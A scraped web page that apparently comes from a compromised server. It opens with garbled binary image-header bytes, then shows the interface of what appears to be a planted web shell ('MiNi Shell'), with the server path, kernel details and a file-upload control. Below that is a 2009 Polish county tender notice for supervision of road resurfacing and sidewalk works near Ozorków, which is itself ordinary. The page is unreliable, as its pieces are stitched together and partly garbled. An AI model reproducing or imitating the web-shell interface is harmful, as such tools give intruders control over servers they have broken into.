JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091014/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091014/359712-N-2009.html

<p class="kh_header"><b>Zgierz: Pełnienie funkcji inspektora nadzoru nad zadaniem 
pn. Wykonanie nakładki bitumicznej na drodze powiatowej Nr 5109 E w m. Boczki, gm. Ozorków, oraz nad zadaniem pn. Przebudowa ciągu pieszego w pasie drogi powiatowej Nr 5128 E ul. Narutowicza w m. Sokolniki Las, gm. Ozorków- dwa zadania</b><br>
<b>Numer ogłoszenia: 359712 - 2009; data zamieszczenia: 14.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu Zgierskiego , ul. Sadowa 6A, 95-100 Zgierz, woj. łódzkie, tel. 042 7190885, faks 042 7190816.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.zgierz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji inspektora nadzoru nad zadaniem 
pn. Wykonanie nakładki bitumicznej na drodze powiatowej Nr 5109 E w m. Boczki, gm. Ozorków, oraz nad zadaniem pn. Przebudowa ciągu pieszego w pasie drogi powiatowej Nr 5128 E ul. Narutowicza w m. Sokolniki Las, gm. Ozorków- dwa zadania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie funkcji inspektora nadzoru nad zadaniem pn Wykonanie nakładki bitumicznej na drodze powiatowej Nr 5109 E w m. Boczki, gm. Ozorków, oraz nad zadaniem pn. Przebudowa ciągu pieszego w pasie drogi powiatowej Nr 5128 E ul. Narutowicza w m. Sokolniki Las, gm. Ozorków- dwa zadania
Zamawiający dopuszcza składanie ofert częściowych, gdzie część (zadanie) stanowi:
Zadanie częściowe nr:	Opis:
1Temat: Pełnienie funkcji inspektora nadzoru nad zadaniem pn. Wykonanie nakładki bitumicznej na drodze Nr 5109 E w m. Boczki, gm. Ozorków, 
Zamówień: 71521000-6 
Charakterystyka nadzorowanej inwestycji:
1.Przedmiotem zamówienia jest robota budowlana polegająca na wykonaniu nakładki bitumicznej na drodze powiatowej Nr 5109 E w m. Boczki, gm. Ozorków.
2.Realizacja przedmiotu zamówienia obejmuje :
1)mechaniczne oczyszczenie i skropienie emulsją asfaltową na zimno podbudowy tłuczniowej lub z gruntu stabilizowanego cementem - 6050 m2,
2)wyrównanie istniejącej podbudowy mieszanką mineralno - bitumiczną asfaltową w ilości 50 kg/m2 - 302,50 t,
3)wykonanie nawierzchni z mieszanek mineralno - bitumicznych asfaltowych o grubości 3 cm (warstwa ścieralna) - 6250 m2,
4)wykonanie nawierzchni z kruszyw łamanych grubości 10 cm na wjazdach do posesji - 204 m2,
5)ścięcie poboczy grubości 1,00 m, obustronnie - 2200 m2 .
3.Wymagania szczegółowe dotyczące wykonania i odbioru robót objętych przedmiotem zamówienia zawarte są w :
a.Ogólnych Specyfikacjach Technicznych (OST) D - M - 00.00.00 Wymagania ogólne, które stanowią załącznik Nr 8 do SIWZ, 
b.Ogólnych Specyfikacjach Technicznych (0ST) D-05.03.05 Nawierzchnia z betonu asfaltowego, które stanowią załącznik Nr 9 do SIWZ,
c.Ogólnych Specyfikacjach Technicznych (OST) D-04.03.01 Oczyszczenie i skropienie warstw konstrukcyjnych, które stanowią załącznik Nr 10 do SIWZ,
d.Ogólnych Specyfikacjach Technicznych (0ST) D - 04.08.00 Wyrównanie podbudowy, które stanowią załącznik Nr 11 do SIWZ,
e.Ogólnych Specyfikacjach Technicznych (OST) D-04.04.00-04.04.03.Podbudowy z kruszywa stabilizowanego mechanicznie, które stanowią załącznik Nr 12 do SIWZ
f.Szczegółowych Specyfikacjach Technicznych (SST) D-04.03.01 Oczyszczenie i skropienie warstw konstrukcyjnych, które stanowią załącznik Nr 13 do SIWZ,
g.Szczegółowych Specyfikacjach Technicznych (SST)  D-04.08.01 Wyrównanie podbudowy mieszankami mineralno - asfaltowymi, które stanowią załącznik Nr 14 do SIWZ,
h.Szczegółowych Specyfikacjach Technicznych (SST)  D-05.03.05 Nawierzchnia z betonu asfaltowego, które stanowią załącznik Nr 15 do SIWZ,
i.Szczegółowych Specyfikacjach Technicznych (SST)  D - 04.04.02 Podbudowa z kruszywa łamanego stabilizowanego mechanicznie, które stanowią załącznik Nr 16 do SIWZ.
Zamawiający zaleca, aby Wykonawcy dokonali wizji lokalnej na terenie objętym nadzorem oraz zapoznali się z dokumentacją techniczną oraz kosztorysową, dotyczącą inwestycji objętej usługą nadzoru. Przedmiotowa dokumentacja dostępna jest na stronie Zamawiającego: www.starostwo.zgierz.pl/przetargi Znak postępowania OR.343-84/09, lub w siedzibie Zamawiającego pok. 307,309
Wykonawca zobowiązany jest zapewnić techniczny, finansowy i organizacyjny nadzór inwestorski. Wykonawca, jako przedstawiciel Zamawiającego odpowiedzialny jest za kontrolę ilościową i jakościową wykonanych robót oraz za kontrolę pod względem zgodności wykonywania robót z warunkami technicznymi opisanymi w dokumentacji kosztorysowej, Ogólnych Specyfikacjach Technicznych i Szczegółowych Specyfikacjach Technicznych.
4.Wykonawca zobowiązany jest do: 
1)udziału w czynnościach przekazania wykonawcy Inwestycji terenu inwestorskich;
2)Zakres podstawowych obowiązków i praw inspektora nadzoru wynika       z art. 25 i 26 ustawy z dnia 7 lipca 1994r. Prawo budowlane (tj. Dz. U. z 2006r., Nr  156, poz. 1118 z późn. zm.) i obejmuje w szczególności:
a)reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności realizacji robót z dokumentacją postępowania,
obowiązującymi przepisami i normami oraz zasadami wiedzy technicznej,
b)uzgadnianie z Zamawiającym wszelkich odstępstw i zmian technologii robót, materiałów i urządzeń,  zgłaszanych przez wykonawcę robót, szczególnie w sytuacjach, gdy zmiany te mogą skutkować rozszerzeniem zakresu rzeczowego określonego umową lub podwyższeniem kosztów realizacji robót,
c)sprawdzanie jakości wykonanych robót budowlanych, wbudowanych materiałów, a  w szczególności zapobieganie zastosowaniu wyrobów
 i materiałów budowlanych wadliwych oraz nie dopuszczonych do obrotu i stosowania w budownictwie,
d)sprawdzanie i odbiór robót budowlanych ulegających zakryciu 
i zanikających, uczestniczenie w próbach rozruchu i odbiorach technicznych instalacji i urządzeń technicznych,
e)przygotowanie i stwierdzenie gotowości do odbioru robót oraz udział   w czynnościach odbioru robót,
f)potwierdzanie ilości wykonanych robót,
g)potwierdzanie usunięcia wad stwierdzonych przy odbiorze,
h)sprawdzanie rozliczeń Wykonawcy robót budowlanych i potwierdzanie należnych mu kwot oraz rozliczenie końcowe inwestycji,
i)uczestniczenie w przeglądach gwarancyjnych okresu gwarancji,
j)inne niezbędne czynności konieczne dla prawidłowego sprawowania nadzoru inwestorskiego.
3)udział w naradach technicznych zwoływanych przez Zamawiającego lub Wykonawcę robót budowlanych.
5.Zamawiający wymaga, aby Wykonawca był przedsiębiorcą  w rozumieniu przepisów ustawy z dnia 2 lipca 2004r. o swobodzie działalności gospodarczej (t.j. Dz. U. z 2007r. Nr 155, poz. 1095 ze zm.).
6.Zamawiający zastrzega, że umowa na wykonanie przedmiotowego zamówienia zostanie zawarta dopiero po wyłonieniu wykonawcy na roboty budowlane.
7.Zleceniobiorca ponosi odpowiedzialność za szkody wyrządzone na skutek nie wykonania lub nienależytego wykonania czynności objętych umową, ocenianego w granicach przewidzianych dla umów starannego działania.
8.Termin realizacji inwestycji 21 dni od dnia przekazania terenu.
9.Okres gwarancji na wykonane prace 24 miesiące. 
2Temat: Pełnienie funkcji inspektora nadzoru nad zadaniem pn. Przebudowa ciągu pieszego w pasie drogi powiatowej Nr 5128 E ul. Narutowicza w m. Sokolniki Las, gm. Ozorków.
Wspólny Słownik Zamówień:  71521000-6
Charakterystyka nadzorowanej inwestycji:
1.Przedmiotem zamówienia jest robota budowlana polegająca na przebudowie ciągu pieszego w pasie drogi powiatowej Nr 5128 E ul. Narutowicza w m. Sokolniki Las, gm. Ozorków. 45233260-9, 
45233262-3.
2.Realizacja przedmiotu zamówienia obejmuje :
1)wykonanie robót związanych z odtworzeniem trasy drogowej i jej punktów wysokościowych przy liniowych robotach ziemnych w szczególności: 
a)sprawdzenie wyznaczenia sytuacyjnego i wysokościowego punktów głównych osi trasy i punktów wysokościowych,
b)uzupełnienie osi trasy dodatkowymi punktami (wyznaczenie osi),
c)wyznaczenie dodatkowych punktów wysokościowych (reperów roboczych),
d)wyznaczenie przekrojów poprzecznych,
e)zastabilizowanie punktów w sposób trwały, ochrona ich przed zniszczeniem oraz oznakowanie  w sposób ułatwiający odszukanie i ewentualne odtworzenie
2)wykonanie robót związanych z usunięciem gęstych krzaków, pni i odrostów, na powierzchni 0,15 ha,
3)wykonanie i odbiór robót związanych z wykonaniem i wyprofilowaniem koryta, na chodnikach, oraz  na zjazdach na powierzchni 765,00 m2 , oraz na wjazdach w ulice dochodzące na powierzchni 440,00 m2 ,
4)wykonanie i odbiór robót ziemnych w ilości 285,00 m3 ,
5)wykonanie i odbiór robót związanych z ustawieniem betonowego obrzeża chodnikowego o wymiarach  100 x 20 x 6 cm na podsypce cementowo - piaskowej z wypełnieniem spoin piaskiem, na długości 940,00 m,  
6)wykonanie  robót, związanych z wykonaniem nawierzchni z brukowej kostki betonowej grubości 6 cm, kolorowej, na podsypce cementowo - piaskowej, z wypełnieniem spoin piaskiem, na chodniku, na powierzchni 722,50 m2,  
7)wykonanie robót związanych z wykonywaniem podbudowy  z kruszywa łamanego stabilizowanego mechanicznie gr. 15 cm na zjazdach na powierzchni 17,50 m2 oraz gr. 20 cm na wjazdach w ulice dochodzące na powierzchni 440,00 m2, 
8)wykonanie robót związanych z wykonaniem wjazdów i wyjazdów z bram z kostki brukowej betonowej, kolorowej, gr. 8 cm na podsypce cementowo - paskowej z wypełnieniem spoin piaskiem,   na powierzchni 17,50 m2, 
9)wykonanie robót związanych z wykonywaniem warstw konstrukcji (warstwa ścieralna gr. 5,0 cm.) nawierzchni z betonu asfaltowego, na ulicach dochodzących na powierzchni 440,00 m2.
3.Wymagania szczegółowe dotyczące wykonania i odbioru robót objętych przedmiotem zamówienia zawarte są w: 
1)Ogólnych Specyfikacjach Technicznych (OST), które stanowią załącznik Nr 5 do SIWZ  w skład której wchodzą:
1.OST - wymagania ogólne,
2.OST- chodniki z kostki,
3.OST - koryto,
4.OST- nawierzchnie,
5.OST- obrzeża,
6.OST - podbudowy,
7.OST- przygotowawcze,
8.OST - roboty ziemne,
9.OST - wjazdy i wyjazdy.
2)Szczegółowych Specyfikacjach Technicznych (SST) Odtworzenie trasy i punktów wysokościowych, które stanowią załącznik Nr 6 do SIWZ, w skład której wchodzą:
1.SST - roboty pomiarowe,
2.SST - karczowanie krzaków, pni i odrostów,
3.SST- koryto,
4.SST - roboty ziemne
5.SST- obrzeża, 
6.SST - chodniki z kostki,
7.SST- podbudowa na zjazdach,
8.SST- kostka na zjazdach
9.SST- nawierzchnia
Zamawiający zaleca, aby Wykonawcy dokonali wizji lokalnej na terenie objętym nadzorem oraz zapoznali się z dokumentacją techniczną oraz kosztorysową, dotyczącą inwestycji objętej usługą nadzoru. Przedmiotowa dokumentacja dostępna jest na stronie Zamawiającego: www.starostwo.zgierz.pl/przetargi Znak postępowania OR.343-87/09, lub w siedzibie Zamawiającego pok. 307,309
Wykonawca zobowiązany jest zapewnić techniczny, finansowy i organizacyjny nadzór inwestorski. Wykonawca, jako przedstawiciel Zamawiającego odpowiedzialny jest za kontrolę ilościową i jakościową wykonanych robót oraz za kontrolę pod względem zgodności wykonywania robót z warunkami technicznymi opisanymi w dokumentacji kosztorysowej, Ogólnych Specyfikacjach Technicznych i Szczegółowych Specyfikacjach Technicznych.
4.Wykonawca zobowiązany jest do: 
1) udziału w czynnościach przekazania wykonawcy Inwestycji terenu inwestorskich;
2) Zakres podstawowych obowiązków i praw inspektora nadzoru wynika  z art. 25 i 26 ustawy z dnia 7 lipca 1994r. Prawo budowlane (tj. Dz.U. z 2006r., Nr  156, poz. 1118 z późn. zm.) i obejmuje w szczególności:
a)reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności realizacji robót z dokumentacją postępowania,
 obowiązującymi przepisami i normami oraz zasadami wiedzy technicznej,
b)uzgadnianie z Zamawiającym wszelkich odstępstw i zmian technologii robót, materiałów i urządzeń,  zgłaszanych przez wykonawcę robót, szczególnie w sytuacjach, gdy zmiany te mogą skutkować rozszerzeniem zakresu rzeczowego określonego umową lub podwyższeniem kosztów realizacji robót,
c)sprawdzanie jakości wykonanych robót budowlanych, wbudowanych materiałów, a  w szczególności zapobieganie zastosowaniu wyrobów
 i materiałów budowlanych wadliwych oraz nie dopuszczonych do obrotu i stosowania w budownictwie,
d)sprawdzanie i odbiór robót budowlanych ulegających zakryciu 
i zanikających, uczestniczenie w próbach rozruchu i odbiorach technicznych instalacji i urządzeń technicznych,
e)przygotowanie i stwierdzenie gotowości do odbioru robót oraz udział    w czynnościach odbioru robót,
f)potwierdzanie ilości wykonanych robót,
g)potwierdzanie usunięcia wad stwierdzonych przy odbiorze,
h)sprawdzanie rozliczeń Wykonawcy robót budowlanych i potwierdzanie należnych mu kwot oraz rozliczenie końcowe inwestycji,
i)uczestniczenie w przeglądach gwarancyjnych okresu gwarancji,
j)inne niezbędne czynności konieczne dla prawidłowego sprawowania nadzoru inwestorskiego.
k)udział w naradach technicznych zwoływanych przez Zamawiającego lub Wykonawcę robót budowlanych.
l)Zamawiający wymaga, aby Wykonawca był przedsiębiorcą  w rozumieniu przepisów ustawy z dnia 2 lipca 2004r. o swobodzie działalności gospodarczej (t.j. Dz. U. z 2007r. Nr 155, poz. 1095 ze zm.).
m)Zamawiający zastrzega, że umowa na wykonanie przedmiotowego zamówienia zostanie zawarta dopiero po wyłonieniu wykonawcy na roboty budowlane.
n)Zleceniobiorca ponosi odpowiedzialność za szkody wyrządzone na skutek nie wykonania lub nienależytego wykonania czynności objętych umową, ocenianego w granicach przewidzianych dla umów starannego działania.
3)Termin realizacji inwestycji 60 dni od dnia zawarcia umowy.
4)Okres gwarancji na wykonane prace 24 miesiące..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.52.10.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo Zamówień Publicznych (Dz. U. z 2007 r. Nr 223, poz. 1655, z późn. zm.), oraz spełniający warunki i wymagania określone w Specyfikacji Istotnych Warunków Zamówienia oraz w art. 22 ustawy Prawo Zamówień Publicznych.
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełnią poniższe warunki udziału w postępowaniu:
4.1. Posiadają uprawnienie do wykonywania określonej działalności  lub czynności  jeżeli ustawy nakładają obowiązek posiadania takich uprawnień i są uprawnienie do prowadzenia działalności  gospodarczej zgodnie z art. 14 ust. 1 ustawy z dnia 2 lipca 2004 r. o swobodzie działalności gospodarczej ( Dz. U. z 2007 r. Nr 155, poz. 1095 )  
4.2.Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia: 
1) Wykonawca w okresie ostatnich 3 latach przed wszczęciem postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - zrealizował co najmniej 2 zamówienia polegające na wykonaniu funkcji inspektora nadzoru robót drogowych o wartości minimum: 
a)dla zadania Nr 1 -  11.000 zł brutto - każda,
b)dla zadania Nr 2 -  5.000 zł brutto - każda,
2) Wykonawca dysponuje min jedną osobą która będzie wykonywać zamówienie, posiadającą uprawnienia do nadzorowania  i kierowania robotami budowlanymi w specjalności konstrukcyjno-inżynieryjnej w zakresie budowy dróg (zgodnie z art. 12 ust. 1 i 2 ustawy - Prawo budowlane) wystawione przez podmioty uprawnione  oraz posiada aktualne zaświadczenie  o przynależności do Okręgowej Izby Inżynierów Budowlanych.
4.3. Znajdują się w sytuacji ekonomicznej 
i finansowej zapewniającej wykonanie zamówienia.
4.4. Nie podlegają wykluczeniu z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 4.1.1.  Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert*.
4.1.2.  Oświadczenie o spełnianiu warunków udziału 
w postępowaniu (Zał. Nr 3)**.
4.2.4Oświadczenie o spełnianiu warunków udziału w postępowaniu (Zał. Nr 3).
* - Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast przedmiotowych dokumentów, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)nie otwarto jego likwidacji ani nie ogłoszono jego upadłości,
b)nie zalega z uiszczaniem podatków, opłat oraz składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c)nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
Dokumenty, o których mowa w a i c., powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, lit. b nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się w/w dokumentów, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
** Oświadczenie o spełnianiu warunków udziału w postępowaniu - wykonawca składa tylko jedno oświadczenie na potwierdzenie każdego warunku.
Ocena spełnienia warunków udziału w Postępowaniu zostanie dokonana metodą spełnia-nie spełnia na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń składających się na ofertę, wg wymogów zawartych w pkt 10 SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.starostwo.zgierz.pl/przetargi.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ (cena 10,40 zł) można odebrać w siedzibie Zamawiającego w Starostwie Powiatowym w Zgierzu przy ul. Sadowej 6A.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.10.2009 godzina 11:00, miejsce: Oferty należy składać w Starostwie Powiatowym w Zgierzu; 95-100 Zgierz, ul. Sadowa 6A w pok. 112 - Kancelaria.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 5.5.1. Od dnia przekazania Wykonawcy robót budowlanych terenu budowy.
 Do dnia zakończenia i odbioru wszystkich robót objętych przedmiotem zamówienia oraz przekazania do użytkowania nadzorowanych inwestycji oraz w okresie trwania gwarancji 
tj. 24 miesięcy licząc od dnia następującego po dniu ostatecznego odbioru ostatniej oddanej do odbioru roboty budowlanej objętej nadzorem inwestorskim.
. - dla zadania częściowego: 1
5.5.2. Od dnia przekazania Wykonawcy robót budowlanych terenu budowy.
Do dnia zakończenia i odbioru wszystkich robót objętych przedmiotem zamówienia oraz przekazania do użytkowania nadzorowanych inwestycji oraz w okresie trwania gwarancji 
tj. 24  miesięcy licząc od dnia następującego po dniu ostatecznego odbioru ostatniej oddanej do odbioru roboty budowlanej objętej nadzorem inwestorskim.
. - dla zadania częściowego: 2.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pełnienie funkcji inspektora nadzoru nad zadaniem pn. Wykonanie nakładki bitumicznej na drodze Nr 5109 E w m. Boczki, gm. Ozorków.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pełnienie funkcji inspektora nadzoru nad zadaniem pn. Wykonanie nakładki bitumicznej na drodze Nr 5109 E w m. Boczki, gm. Ozorków, 
Zamówień: 71521000-6 
Charakterystyka nadzorowanej inwestycji:
1.Przedmiotem zamówienia jest robota budowlana polegająca na wykonaniu nakładki bitumicznej na drodze powiatowej Nr 5109 E w m. Boczki, gm. Ozorków.
2.Realizacja przedmiotu zamówienia obejmuje :
1)mechaniczne oczyszczenie i skropienie emulsją asfaltową na zimno podbudowy tłuczniowej lub z gruntu stabilizowanego cementem - 6050 m2,
2)wyrównanie istniejącej podbudowy mieszanką mineralno - bitumiczną asfaltową w ilości 50 kg/m2 - 302,50 t,
3)wykonanie nawierzchni z mieszanek mineralno - bitumicznych asfaltowych o grubości 3 cm (warstwa ścieralna) - 6250 m2,
4)wykonanie nawierzchni z kruszyw łamanych grubości 10 cm na wjazdach do posesji - 204 m2,
5)ścięcie poboczy grubości 1,00 m, obustronnie - 2200 m2 .
3.Wymagania szczegółowe dotyczące wykonania i odbioru robót objętych przedmiotem zamówienia zawarte są w :
a.Ogólnych Specyfikacjach Technicznych (OST) D - M - 00.00.00 Wymagania ogólne, które stanowią załącznik Nr 8 do SIWZ, 
b. Ogólnych Specyfikacjach Technicznych (0ST) D-05.03.05 Nawierzchnia z betonu asfaltowego, które stanowią załącznik Nr 9 do SIWZ,
c.Ogólnych Specyfikacjach Technicznych (OST) D-04.03.01 Oczyszczenie i skropienie warstw konstrukcyjnych, które stanowią załącznik Nr 10 do SIWZ,
